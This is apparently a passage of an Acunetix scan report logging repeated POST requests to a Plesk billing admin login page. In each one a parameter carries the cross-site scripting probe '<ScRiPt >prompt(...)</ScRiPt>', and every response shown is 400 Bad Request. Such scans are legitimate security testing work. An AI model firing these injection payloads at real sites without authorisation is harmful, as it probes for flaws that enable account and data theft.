POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 934
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=c9dps92q7ckk9m0d3ylk7219odllhffp7io&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:19 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:19 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(990986)</ScRiPt>
Request
Acunetix Website Audit13
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=a2e382443rlratzlfj4buc9z7dllhfd4smq&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:18 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:19 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(964291)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=c220q1jnalmn2xo8hd0quy5psdllhfhhfw6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:19 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:19 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(902881)</ScRiPt>
Request
Acunetix Website Audit14
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 992
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=vtk10sf6g7c9jhtzd1f55jfm0dllhfhvbpa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:20 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:20 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(980991)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 928
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=vqde3mrhcmcu72zf2edh2jk25dllhfhnnso&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:19 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:20 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(908059)</ScRiPt>
Request
Acunetix Website Audit15
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 992
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=bjhuaj5t7lv9jg0oq9u6qvaxxdllhfog5bs&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:23 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(956911)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 925
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...fQui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=wn0u0cu6wa17iw518ownqndidllhfofoug&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:23 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(942769)</ScRiPt>
Request
Acunetix Website Audit16
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...JMD2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=oiuo1znyttbbn4tii5j9fludllhfogmac&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:24 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(915313)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 928
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=q6doj6qcwss13qtaxjubgcaradllhfongy9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:24 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(990098)</ScRiPt>
Request
Acunetix Website Audit17
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=icw7s5pdqfo8vija34r3mn3ijdllhfojnpz&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:24 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(920609)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 934
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...R7ReiRSqH0qkwPRQRN%2fMOKZPNErl45LZNYSkyIUb%2bRFvmdZNX6ZXdByKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=xg4vbfmkb6zlp1yoqnjof5q6cdllhfof70a&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:23 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(997662)</ScRiPt>
Request
Acunetix Website Audit18
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 940
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...D2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=gthavoihu30xh5rn2y17pmtz8dllhflhn6h&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:22 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(980149)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 992
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Z%2fLcsRMvBKe4gDJc0qtVguUx%2bpcitV3RshXJgCWM9LVYd9nmxz5bvUH9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=xh7fm5pytl68venj5o9ntx314dllhflgyxa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:21 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:22 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(928019)</ScRiPt>
Request
Acunetix Website Audit19
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 926
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Qui48Jr7kWc7%2buki327nEsxhbugqa1obIABnOiBoam6vmrz24wfE4nkcysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=mr11nzj4fvmp0lpbypseqdzlldllhflhvlc&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:22 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(977687)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 928
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...ovhAtAiwKC356KANm%2f7qUTHZFLA5jWxZZccb5OT68r4qmLer0VsPHRIj6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=ohkar5872rzsy18z2r3mpyh30dllhfn1zz3&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:23 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded POST input message_id was set to '"()&%1<ScRiPt >prompt(910482)</ScRiPt>
Request
Acunetix Website Audit20
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...Cizilrmx8cyqMzqkIhnAnRxKqblgSogAJf4QVcVTVvU6VX9hyLEWalhs6SjMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=tnwmthto6bbbbdmsqv672stspdllhfmupb6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:22 GMT
Server: sw-cp-server
Content-Length: 153
/plesk-billing/admin/index.php/default
Details
URL encoded GET input sso_api_path was set to '"()&%1<ScRiPt >prompt(914897)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28914897%29%3c%2fScRiPt%3e HTTP/1.1
Content-Length: 884
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...D2UUW3BHfIutji49Sq1be4qYACX9EBXFU1b1Pmt%2bg9ETMa5ETPySZmwx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=xegaz4qhrmgkat9654pnylmtjdllhfhwcbo&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=idp_login
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:34:14 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:34:14 GMT
Server: sw-cp-server
Content-Length: 124
/plesk-billing/admin/index.php/default
Details
